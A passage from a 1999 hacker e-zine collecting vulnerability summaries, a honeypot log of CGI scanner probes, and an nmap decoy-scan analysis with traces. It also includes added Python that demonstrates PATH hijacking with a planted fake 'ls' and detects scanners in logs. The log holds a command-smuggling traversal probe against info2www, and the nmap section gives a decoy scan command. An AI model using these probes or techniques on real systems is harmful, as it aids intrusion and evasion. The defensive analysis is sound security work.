Summary: A buffer overflow vulnerability has been discovered in the Source Code Browser's Program Database Name Server Daemon (pdnsd) of versions 2 and 3 of IBM's C Set ++ for AIX. This vulnerability allows local and remote users to gain root access. While IBM no longer supports the affected versions, there is a workaround available at the above URL.

9. BSDI Symmetric Multiprocessing (SMP) Vulnerability
Bugtraq ID: 589
Remote: No
Date Published: 1999-08-18
Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=589
Summary: A vulnerability exists in BSDi 4.0.1 Symmetric Multiprocessing (SMP). During high CPU usage it is possible to cause BSDi 4.0.1 (possibly others, but untested) with all current patches to stop responding and 'lock up' when a call to fstat is made.
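Entries 5 and 6 are the same bug class: a setuid-root program lets the invoker's environment decide what gets executed, either through a variable holding a script path (dbsnmp) or through the PATH and IFS that a spawned shell honours (xmonisdn's system() call). The Python below is an added illustration, not code from either package: it shows how a PATH supplied by the caller redirects a bare command name to an attacker's file, and a helper-launching routine that refuses relative paths, checks ownership and write bits the way xmonisdn did, and execs without a shell under a fixed environment instead of the inherited one. The temporary directories, the fake `ls`, the `netup.sh` helper and the trusted-PATH value are constructed for the example.

```python
import os
import shutil
import stat
import subprocess
import tempfile

# Fixed search path a privileged helper should use instead of whatever PATH
# the (untrusted) invoker exported. Constructed for the example.
TRUSTED_PATH = '/bin:/usr/bin'

def resolve_like_system(command: str, caller_path: str):
    """What system("command") ends up running: /bin/sh walks the caller's PATH."""
    return shutil.which(command, path=caller_path)

def resolve_hardened(command: str):
    """Same lookup, but against a path the privileged program owns."""
    return shutil.which(command, path=TRUSTED_PATH)

def is_trusted_file(path: str, owner_uid: int = 0) -> bool:
    """The check xmonisdn made: regular file, owned by root, not group/world writable."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return (stat.S_ISREG(st.st_mode)
            and st.st_uid == owner_uid
            and not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)))

def clean_env() -> dict:
    # No inherited PATH, no IFS, no LD_* or other loader variables: the helper
    # sees only what we hand it. (Old Bourne shells applied IFS when parsing
    # the command line itself, so IFS=/ turned "/bin/script" into the words
    # "bin script" and PATH then decided which "bin" ran.)
    return {'PATH': TRUSTED_PATH}

def run_helper(script: str, owner_uid: int = 0) -> str:
    """Run a privileged helper the way a setuid program should: absolute path,
    ownership and mode check, no shell, fixed environment. Returns its stdout."""
    if not os.path.isabs(script):
        raise ValueError('helper path must be absolute: %r' % script)
    if not is_trusted_file(script, owner_uid):
        raise PermissionError('refusing untrusted helper: %r' % script)
    proc = subprocess.run([script], env=clean_env(), capture_output=True,
                          text=True, check=True)
    return proc.stdout

def demo_path_hijack() -> dict:
    """Plant a fake 'ls' in a directory the attacker controls and compare lookups."""
    evil_dir = tempfile.mkdtemp(prefix='evil-path-')
    fake = os.path.join(evil_dir, 'ls')
    with open(fake, 'w') as fh:
        fh.write('#!/bin/sh\necho hijacked\n')
    os.chmod(fake, 0o755)
    attacker_path = evil_dir + os.pathsep + TRUSTED_PATH
    return {
        'evil_dir': evil_dir,
        'via_system': resolve_like_system('ls', attacker_path),
        'via_hardened': resolve_hardened('ls'),
    }

def demo_run_helper():
    """Write a helper we own, run it through run_helper(), then show that the
    same script is refused once it becomes group/world writable."""
    workdir = tempfile.mkdtemp(prefix='helper-')
    script = os.path.join(workdir, 'netup.sh')
    with open(script, 'w') as fh:
        fh.write('#!/bin/sh\necho route-added\n')
    os.chmod(script, 0o700)
    me = os.getuid()          # stands in for root's uid 0 in this demo
    output = run_helper(script, owner_uid=me)
    os.chmod(script, 0o777)   # now anyone could swap in their own commands
    try:
        run_helper(script, owner_uid=me)
        rejected = False
    except PermissionError:
        rejected = True
    return output.strip(), rejected

if __name__ == '__main__':
    r = demo_path_hijack()
    print('system() would run:', r['via_system'])
    print('hardened lookup:   ', r['via_hardened'])
    print('helper run, then refused when writable:', demo_run_helper())
```

The ownership check alone did not save xmonisdn, and it would not save dbsnmp either: once the program trusts a path or a search order that the unprivileged caller controls, the attacker never has to touch the protected file. Fixing the environment and the path is what removes the caller from the decision.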
10. Redhat Linux tgetent() Buffer Overflow
Bugtraq ID: 588
Remote: No
Date Published: 1999-08-18
Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=588
Summary: A buffer overflow existed in libtermcap's tgetent() function, which could allow a user able to supply their own termcap file to execute arbitrary code. Red Hat has released a series of RPMs to solve this issue. Please see 'solution' at the above URL for more information.

11. Linux in.telnetd Denial of Service Vulnerability
Bugtraq ID: 594
Remote: Yes
Date Published: 1999-08-19
Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=594
Summary: When a telnet client connects to in.telnetd, the two attempt to negotiate a compatible terminal type (via the TERM environment variable). If TERM is set in the client before connecting, then depending on what TERM was set to, a denial of service can be caused. Red Hat has released a series of RPMs to solve this issue. Please see 'solution' at the above URL for more information.

12. QMS 2060 Printer Passwordless Root Vulnerability
Bugtraq ID: 593
Remote: Yes
Date Published: 1999-08-19
Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=593
Summary: Access to the QMS 2060 printer is controlled by the passwd.ftp file. This file contains simply a list of usernames and passwords. However, even with this file in place, root can still log on without entering a password. This would allow the attacker to alter the passwd.ftp file, as well as the hosts file which lists the machines authorized to print to the QMS.

13. Microsoft JET Text I-ISAM Vulnerability
Bugtraq ID: 595
Remote: Yes
Date Published: 1999-08-20
Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=595
Summary: Microsoft's JET database engine includes a functionality referred to as Text I-ISAM.
This allows the JET driver to write to a text file, for the purpose of another application to read later. This was implemented to allow data sharing between JET applications and other applications that don't support Dynamic Data Exchange. The vulnerability lies in the fact that any text file can be written to, including system files. Because of this, a database query could be created that added destructive commands to a startup file or script. Microsoft has released patches for both JET 3.5x and 4.0:
3.5x: http://www.securityfocus.com/external/http://support.microsoft.com/download/support/mslfiles/Jet35sp3.exe
4.0: http://www.securityfocus.com/external/http://support.microsoft.com/download/support/mslfiles/Jet40sp1.exe

@HWA

57.0 A typical script kiddie attack scenario against an HTTP server
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Picked up from the message board of www.securityfocus.com...

To: Incidents
Subject: kiddie attack via http
Date: Wed Aug 18 1999 05:13:35
Author: acpizer
Message-ID:

Once upon a time I set up a small bait for lusers such as this one, and it finally paid off:

Aug 12 09:44:52 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:52 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:52 snork fun-httpd: cmd buff: GET /asakaeval HTTP/1.0^M ^M
Aug 12 09:44:52 snork fun-httpd: cmd buff: GET /cgi-bin/phf/ HTTP/1.0^M
Aug 12 09:44:53 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:53 snork fun-httpd: cmd buff: GET /cgi-bin/phf/ HTTP/1.0^M
Aug 12 09:44:54 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:54 snork fun-httpd: cmd buff: GET /cgi-bin/php.cgi/ HTTP/1.0^M
Aug 12 09:44:55 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:55 snork fun-httpd: cmd buff: GET /cgi-bin/campas/ HTTP/1.0^M
Aug 12 09:44:56 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:56 snork fun-httpd: cmd buff: GET /cgi-bin/htmlscript/ HTTP/1.0^M
Aug 12 09:44:57 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:57 snork fun-httpd: cmd buff: GET /cgi-bin/aglimpse/ HTTP/1.0^M
Aug 12 09:44:58 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:44:59 snork fun-httpd: cmd buff: GET /cgi-bin/websendmail/ HTTP/1.0^M
Aug 12 09:45:00 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:45:00 snork fun-httpd: cmd buff: GET /cgi-bin/websendmail/ HTTP/1.0^M
Aug 12 09:45:01 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:45:01 snork fun-httpd: cmd buff: GET /info2www HTTP/1.0^M
Aug 12 09:45:03 snork fun-httpd: cmd buff: GET /cgi-bin/pfdispaly.cgi/ HTTP/1.0
Aug 12 09:45:04 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:45:04 snork fun-httpd: cmd buff: GET /scripts/convert.bas/ HTTP/1.0^M
Aug 12 09:45:19 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:45:19 snork fun-httpd: got connection from 204.60.37.97
Aug 12 09:45:19 snork fun-httpd: cmd buff: GET /info2www '(../../../../../../../bin/mail

For details on many cgi based vulnerabilities, I suggest having a look at http://v0rt.dayrom.com.au under the advisories section. We list a lot of common cgi vulnerabilities as well as a tool to scan for most of these (http://v0rt.dayrom.com.au/profiler/profiler.c).

As for the /asakaeval attack, I also have not seen any information regarding this.

As a final note, also check your access_log for entries sent as hex; some httpd servers do not correctly log requests sent as hex, therefore it is not obvious to the naked eye what they are scanning for.

v0rt_

-------------------------------------------------------------------------------
"Probably you've only really grown up, when you can bear not being understood."
Marian Gold /Alphaville

@HWA

58.0 NMAP - Scan Analysis (v2)
~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.whitehats.com/

Hello,

This page is for anyone who cares to see the details behind an NMAP scan with the -D decoy option set.
Basically I hope to answer two questions:

Does NMAP spoof every aspect of the scan, including ICMP, ACK, and OS Identification? (yes, beautifully if used properly)

Can you tell which host in a Decoy Storm is the real host? (no, if used properly)

When I created a case study of these topics earlier today I used decoy hosts that were not responsive (nonexistent IP addresses). Fyodor quickly pointed out that this breaks one of the cardinal rules of decoy scanning. The decoys must be alive. :)

NMAP appears to correctly spoof identical packets for every operation, sending an identical packet for each source address (your local system, and each of the decoys). My initial testing showed that only the local system sends RST's in response to successfully queried ports in a SYN scan. However, this behavior is correct. The local system should not send RST's on behalf of the other systems, because that is exactly what they are supposed to do. My test decoys (23.23.23.23 and 24.24.24.24) are not active hosts, and so would not generate the expected RST packets. Had I used responsive decoy hosts, the local system source address would be indistinguishable from the others.

FIN, NULL, XMAS, and UDP scans appear to work equally well with the -D decoy option.

Hope someone finds this remotely useful or interesting.

-Max Vision

Decoys, without OS detection

[audit ~]# nmap -sS -D23.23.23.23,ME,24.24.24.24 -p 80 www.example.com

Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)

ICMP Probe
19:44:00.294222 23.23.23.23 > www.example.com: icmp: echo request
19:44:00.304222 audit.example.com > www.example.com: icmp: echo request
19:44:00.304222 24.24.24.24 > www.example.com: icmp: echo request

ACK Probe
19:44:00.314222 23.23.23.23.38159 > www.example.com.http: . ack 0 win 1024
19:44:00.314222 audit.example.com.38159 > www.example.com.http: . ack 0 win 1024
19:44:00.314222 24.24.24.24.38159 > www.example.com.http: . ack 0 win 1024

Hey we got a live one here!@#$
19:44:00.324222 www.example.com.http > audit.example.com.38159: R 0:0(0) win 0 (DF)

SYN scan
19:44:00.394222 23.23.23.23.38139 > www.example.com.http: S 1559207492:1559207492(0) win 1024
19:44:00.394222 audit.example.com.38139 > www.example.com.http: S 1559207492:1559207492(0) win 1024
19:44:00.404222 24.24.24.24.38139 > www.example.com.http: S 1559207492:1559207492(0) win 1024

SYN+ACK response means open port here. We RST appropriately.
Note: If you use valid decoys they will RST as well.
19:44:00.424222 www.example.com.http > audit.example.com.38139: S 3305543706:3305543706(0) ack 1559207493 win 9112 (DF)
19:44:00.424222 audit.example.com.38139 > www.example.com.http: R 1559207493:1559207493(0) win 0

Interesting ports on www.example.com (1.1.1.1):
Port    State       Protocol  Service
80      open        tcp       http

Nmap run completed -- 1 IP address (1 host up) scanned in 0 seconds

Decoys, OS detection

[audit ~]# nmap -sS -D23.23.23.23,ME,24.24.24.24 -O -p 80 www.example.com

Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)

ICMP Probe
19:29:55.854222 23.23.23.23 > www.example.com: icmp: echo request
19:29:55.864222 audit.example.com > www.example.com: icmp: echo request
19:29:55.864222 24.24.24.24 > www.example.com: icmp: echo request

ACK Probe
19:29:55.864222 23.23.23.23.63836 > www.example.com.http: . ack 0 win 1024
19:29:55.874222 audit.example.com.63836 > www.example.com.http: . ack 0 win 1024
19:29:55.874222 24.24.24.24.63836 > www.example.com.http: . ack 0 win 1024

Wooop got your nose!@#$
19:29:55.884222 www.example.com.http > audit.example.com.63836: R 0:0(0) win 0 (DF)

SYN scan
19:29:55.954222 23.23.23.23.63816 > www.example.com.http: S 1315816470:1315816470(0) win 1024
19:29:55.964222 audit.example.com.63816 > www.example.com.http: S 1315816470:1315816470(0) win 1024
19:29:55.964222 24.24.24.24.63816 > www.example.com.http: S 1315816470:1315816470(0) win 1024

SYN+ACK response means open port here. We RST appropriately.
Note: If you use valid decoys they will RST as well.
19:29:55.974222 www.example.com.http > audit.example.com.63816: S 3191891171:3191891171(0) ack 1315816471 win 9112 (DF)
19:29:55.974222 audit.example.com.63816 > www.example.com.http: R 1315816471:1315816471(0) win 0

OS Detection (Solaris shown)
19:29:55.984222 23.23.23.23.63823 > www.example.com.http: S 3812808641:3812808641(0) win 1024
19:29:55.984222 audit.example.com.63823 > www.example.com.http: S 3812808641:3812808641(0) win 1024
19:29:55.984222 24.24.24.24.63823 > www.example.com.http: S 3812808641:3812808641(0) win 1024
19:29:55.984222 23.23.23.23.63824 > www.example.com.http: . win 1024
19:29:55.984222 audit.example.com.63824 > www.example.com.http: . win 1024
19:29:55.984222 24.24.24.24.63824 > www.example.com.http: . win 1024
19:29:55.994222 23.23.23.23.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0
19:29:55.994222 audit.example.com.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0
19:29:55.994222 24.24.24.24.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0
19:29:55.994222 23.23.23.23.63826 > www.example.com.http: . ack 0 win 1024
19:29:55.994222 www.example.com.http > audit.example.com.63823: S 3192034216:3192034216(0) ack 3812808642 win 8855 (DF)
19:29:55.994222 audit.example.com.63823 > www.example.com.http: R 3812808642:3812808642(0) win 0
19:29:56.004222 audit.example.com.63826 > www.example.com.http: . ack 0 win 1024
19:29:56.004222 24.24.24.24.63826 > www.example.com.http: . ack 0 win 1024
19:29:56.004222 23.23.23.23.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024
19:29:56.004222 audit.example.com.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024
19:29:56.004222 24.24.24.24.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024
19:29:56.004222 23.23.23.23.63828 > www.example.com.34599: . ack 0 win 1024
19:29:56.014222 audit.example.com.63828 > www.example.com.34599: . ack 0 win 1024
19:29:56.014222 24.24.24.24.63828 > www.example.com.34599: . ack 0 win 1024
19:29:56.014222 23.23.23.23.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0
19:29:56.014222 audit.example.com.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0
19:29:56.014222 24.24.24.24.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0
19:29:56.014222 23.23.23.23.63816 > www.example.com.34599: udp 300
19:29:56.014222 www.example.com.http > audit.example.com.63826: R 0:0(0) win 0 (DF)
19:29:56.024222 audit.example.com.63816 > www.example.com.34599: udp 300
19:29:56.024222 24.24.24.24.63816 > www.example.com.34599: udp 300
19:29:56.634222 23.23.23.23.63824 > www.example.com.http: . win 1024
19:29:56.644222 audit.example.com.63824 > www.example.com.http: . win 1024
19:29:56.644222 24.24.24.24.63824 > www.example.com.http: . win 1024
19:29:56.644222 23.23.23.23.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0
19:29:56.644222 audit.example.com.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0
19:29:56.644222 24.24.24.24.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0
19:29:56.644222 23.23.23.23.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024
19:29:56.644222 audit.example.com.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024
19:29:56.654222 24.24.24.24.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024
19:29:56.654222 23.23.23.23.63828 > www.example.com.34599: . ack 1 win 1024
19:29:56.654222 audit.example.com.63828 > www.example.com.34599: . ack 1 win 1024
19:29:56.654222 24.24.24.24.63828 > www.example.com.34599: . ack 1 win 1024
19:29:56.654222 23.23.23.23.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0
19:29:56.654222 audit.example.com.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0
19:29:56.654222 24.24.24.24.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0
19:29:56.664222 23.23.23.23.63816 > www.example.com.34599: udp 300
19:29:56.664222 audit.example.com.63816 > www.example.com.34599: udp 300
19:29:56.664222 24.24.24.24.63816 > www.example.com.34599: udp 300

Sequencing (hey with bsd TTCP and the Linux messup, who needs sequencing? :)
19:29:57.184222 23.23.23.23.63817 > www.example.com.http: S 3812808642:3812808642(0) win 1024
19:29:57.204222 audit.example.com.63817 > www.example.com.http: S 3812808642:3812808642(0) win 1024
19:29:57.214222 www.example.com.http > audit.example.com.63817: S 3192528068:3192528068(0) ack 3812808643 win 9112 (DF)
19:29:57.214222 audit.example.com.63817 > www.example.com.http: R 3812808643:3812808643(0) win 0
19:29:57.224222 24.24.24.24.63817 > www.example.com.http: S 3812808642:3812808642(0) win 1024
19:29:57.244222 23.23.23.23.63818 > www.example.com.http: S 3812808643:3812808643(0) win 1024
19:29:57.264222 audit.example.com.63818 > www.example.com.http: S 3812808643:3812808643(0) win 1024
19:29:57.274222 www.example.com.http > audit.example.com.63818: S 3192724219:3192724219(0) ack 3812808644 win 9112 (DF)
19:29:57.274222 audit.example.com.63818 > www.example.com.http: R 3812808644:3812808644(0) win 0
19:29:57.284222 24.24.24.24.63818 > www.example.com.http: S 3812808643:3812808643(0) win 1024
19:29:57.304222 23.23.23.23.63819 > www.example.com.http: S 3812808644:3812808644(0) win 1024
19:29:57.324222 audit.example.com.63819 > www.example.com.http: S 3812808644:3812808644(0) win 1024
19:29:57.334222 www.example.com.http > audit.example.com.63819: S 3192958008:3192958008(0) ack 3812808645 win 9112 (DF)
19:29:57.334222 audit.example.com.63819 > www.example.com.http: R 3812808645:3812808645(0) win 0
19:29:57.344222 24.24.24.24.63819 > www.example.com.http: S 3812808644:3812808644(0) win 1024
19:29:57.364222 23.23.23.23.63820 > www.example.com.http: S 3812808645:3812808645(0) win 1024
19:29:57.384222 audit.example.com.63820 > www.example.com.http: S 3812808645:3812808645(0) win 1024
19:29:57.394222 www.example.com.http > audit.example.com.63820: S 3193157286:3193157286(0) ack 3812808646 win 9112 (DF)
19:29:57.394222 audit.example.com.63820 > www.example.com.http: R 3812808646:3812808646(0) win 0
19:29:57.404222 24.24.24.24.63820 > www.example.com.http: S 3812808645:3812808645(0) win 1024
19:29:57.424222 23.23.23.23.63821 > www.example.com.http: S 3812808646:3812808646(0) win 1024
19:29:57.444222 audit.example.com.63821 > www.example.com.http: S 3812808646:3812808646(0) win 1024
19:29:57.454222 www.example.com.http > audit.example.com.63821: S 3193331920:3193331920(0) ack 3812808647 win 9112 (DF)
19:29:57.454222 audit.example.com.63821 > www.example.com.http: R 3812808647:3812808647(0) win 0
19:29:57.464222 24.24.24.24.63821 > www.example.com.http: S 3812808646:3812808646(0) win 1024
19:29:57.484222 23.23.23.23.63822 > www.example.com.http: S 3812808647:3812808647(0) win 1024
19:29:57.504222 audit.example.com.63822 > www.example.com.http: S 3812808647:3812808647(0) win 1024
19:29:57.514222 www.example.com.http > audit.example.com.63822: S 3193574611:3193574611(0) ack 3812808648 win 9112 (DF)
19:29:57.514222 audit.example.com.63822 > www.example.com.http: R 3812808648:3812808648(0) win 0
19:29:57.524222 24.24.24.24.63822 > www.example.com.http: S 3812808647:3812808647(0) win 1024

Interesting ports on www.example.com (1.1.1.1):
Port    State       Protocol  Service
80      open        tcp       http

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=25258 (Worthy challenge)
Remote operating system guess: Solaris 2.6 - 2.7

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds

Thanks for reading, have fun!
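The honeypot log in section 57 and the decoy trace in section 58 both come down to recognising a pattern across log lines rather than a single bad request. The Python below is an added example, not code from either post: it decodes and normalises request paths from a Common Log Format access_log (covering the hex-encoded requests the follow-up warns about), flags any source that probes several of the CGI names the honeypot recorded, and separately groups SYNs in a tcpdump trace by destination, source port, initial sequence number and window to surface an nmap decoy storm. The sample access_log lines are constructed from the honeypot's probes (the source address is the one in the post); the trace lines are copied from the first nmap run above; the path list and thresholds are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# ---- Section 57: CGI scanner detection over a Common Log Format access_log --
# Paths the honeypot saw probed, normalised (no trailing slash). A server that
# serves none of these should treat several of them from one source as a scan.
SCANNER_PATHS = {
    '/cgi-bin/phf', '/cgi-bin/php.cgi', '/cgi-bin/campas', '/cgi-bin/htmlscript',
    '/cgi-bin/aglimpse', '/cgi-bin/websendmail', '/info2www',
    '/cgi-bin/pfdispaly.cgi', '/scripts/convert.bas',
}
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

def normalize_path(raw: str) -> str:
    """Decode %xx escapes (twice, to catch double encoding), drop the query
    string and trailing slash so a hex-encoded probe compares like a plain one."""
    path = unquote(unquote(raw.split('?', 1)[0]))
    path = re.sub(r'/+', '/', path)
    return path.rstrip('/') or '/'

def find_cgi_scanners(lines, threshold: int = 3) -> dict:
    """Map source -> sorted known-bad paths it probed, for sources that touched
    at least `threshold` distinct ones."""
    probes = defaultdict(set)
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        src, _method, raw, _status = m.groups()
        path = normalize_path(raw)
        for bad in SCANNER_PATHS:
            if path == bad or path.startswith(bad + '/'):
                probes[src].add(bad)
    return {src: sorted(p) for src, p in probes.items() if len(p) >= threshold}

# ---- Section 58: spotting an nmap -D decoy storm in a tcpdump trace ---------
# In the capture above every decoy's SYN carries the same source port, initial
# sequence number and window, within a few milliseconds. Several sources
# sharing that tuple is the fingerprint of a decoy scan; the fields alone do
# not say which source is the real scanner.
TCPDUMP_SYN = re.compile(
    r'^(\d\d:\d\d:\d\d\.\d+) (\S+)\.(\d+) > (\S+)\.(\S+): S (\d+):\d+\(0\) win (\d+)')

def find_decoy_storms(lines, min_sources: int = 2) -> dict:
    """Map (dst, dport, sport, isn, win) -> sorted sources that sent that SYN."""
    groups = defaultdict(set)
    for line in lines:
        m = TCPDUMP_SYN.match(line)
        if not m:
            continue
        _ts, src, sport, dst, dport, isn, win = m.groups()
        groups[(dst, dport, sport, isn, win)].add(src)
    return {k: sorted(v) for k, v in groups.items() if len(v) >= min_sources}

# Constructed sample input. The access_log lines restate the honeypot's probes
# in CLF (one of them hex-encoded, as the follow-up warns about); the trace
# lines are the SYN-scan packets from the first nmap run above.
ACCESS_LOG = """\
204.60.37.97 - - [12/Aug/1999:09:44:52 -0400] "GET /asakaeval HTTP/1.0" 404 -
204.60.37.97 - - [12/Aug/1999:09:44:52 -0400] "GET /cgi-bin/phf/ HTTP/1.0" 404 -
204.60.37.97 - - [12/Aug/1999:09:44:54 -0400] "GET /cgi-bin/%70%68%70.cgi/ HTTP/1.0" 404 -
204.60.37.97 - - [12/Aug/1999:09:44:55 -0400] "GET /cgi-bin/campas/ HTTP/1.0" 404 -
204.60.37.97 - - [12/Aug/1999:09:45:19 -0400] "GET /info2www?'(../../../../../../../bin/mail HTTP/1.0" 404 -
10.0.0.5 - - [12/Aug/1999:10:01:00 -0400] "GET /index.html HTTP/1.0" 200 1234
""".splitlines()

TRACE = """\
19:44:00.394222 23.23.23.23.38139 > www.example.com.http: S 1559207492:1559207492(0) win 1024
19:44:00.394222 audit.example.com.38139 > www.example.com.http: S 1559207492:1559207492(0) win 1024
19:44:00.404222 24.24.24.24.38139 > www.example.com.http: S 1559207492:1559207492(0) win 1024
19:44:00.424222 www.example.com.http > audit.example.com.38139: S 3305543706:3305543706(0) ack 1559207493 win 9112 (DF)
19:44:00.424222 audit.example.com.38139 > www.example.com.http: R 1559207493:1559207493(0) win 0
""".splitlines()

if __name__ == '__main__':
    for src, paths in find_cgi_scanners(ACCESS_LOG).items():
        print('CGI scanner', src, 'probed', ', '.join(paths))
    for (dst, dport, sport, isn, win), srcs in find_decoy_storms(TRACE).items():
        print('decoy storm against %s:%s (sport %s, isn %s) from %s'
              % (dst, dport, sport, isn, ', '.join(srcs)))
```

Note what the decoy grouping does and does not give a defender: it identifies the storm and lists every source in it, but with live decoys each of those hosts also answers the target's SYN+ACK with a RST, so nothing in the trace singles out the real scanner. That is the point Max Vision makes above, and the reason nmap insists the decoys be alive.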
@HWA

59.0 Security Focus: Incidents Summary
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

IV. INCIDENTS SUMMARY 1999-08-16 to 1999-08-22
------------------------------------------

1. investigating
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-08-15&msg=002301bee915$8587b100$2b81fea9@tarleton.edu

2. kiddie attack via http
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-08-15&thread=Pine.NEB.3.96.990819111619.20441B-100000@mach.unseen.org

3. Asaka (was Re: kiddie attack via http)
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-08-15&thread=37BC586C.42EF65E0@globalstar.com

4. Re: investigating
Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-08-15&msg=Pine.GSO.4.05.9908211843310.2417-100000@toutatis.comune.modena.it

60.0 Security Focus: Jobs
~~~~~~~~~~~~~~~~~~~~

V. SECURITY JOBS 1999-08-16 to 1999-08-22
-------------------------------------

Seeking Position:

1. Contact: jam smith
Qualifications: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&thread=385620377.935021596329.JavaMail.root@web09.mail.com
Date Posted: 1999-08-18

Seeking Staff:

2. Position: mid-level Network Security Engineer
Reply to: Chris Riley
Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=37B825AD.8064E6F8@info-tools.com
Date Posted: 1999-08-16

3. Position: senior networking staff
Reply to: Vince Reed
Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=v04210105b3e090fa310b@[128.29.230.9]
Date Posted: 1999-08-17

4. Position: Security Engineer
Reply to: Hal Lockhart
Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=9D8B3C643D2AD311BC8D00508B120BA40F5ACC@mahqexc01.storagenetworks.com
Date Posted: 1999-08-18

5. Position: Security Engineer
Reply to: Ben Keepper
Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=000f01bee9f8$1903e740$d9990018@cv1.sdca.home.com
Date Posted: 1999-08-18

6. Position: Security Consultant
Reply to: Bryan Bushman
Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=0013A20F.4077@capitalone.com
Date Posted: 1999-08-18

7. Position: Network Security Administrator
Reply to: Wooldridge, Doug
Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=35AB03C74901D2119DAA00A0C9B6A1FB9576DD@exchange5.echostar.com
Date Posted: 1999-08-19

8. Position: Project Leader, Team Leader, and Security Engineers
Reply to: Eric Maiwald
Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=Pine.GSO.3.96.990820141043.8181A-100000@ss5.fred.net
Date Posted: 1999-08-20

@HWA

-=----------=- -=----------=- -=----------=- -=----------=- O 0 o O O O 0 -=----------=- -=----------=- -=----------=- -=----------=- -=----------=-

END of main news articles content... read on for ads, humour, hacked websites etc

-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-

HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More.
* * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 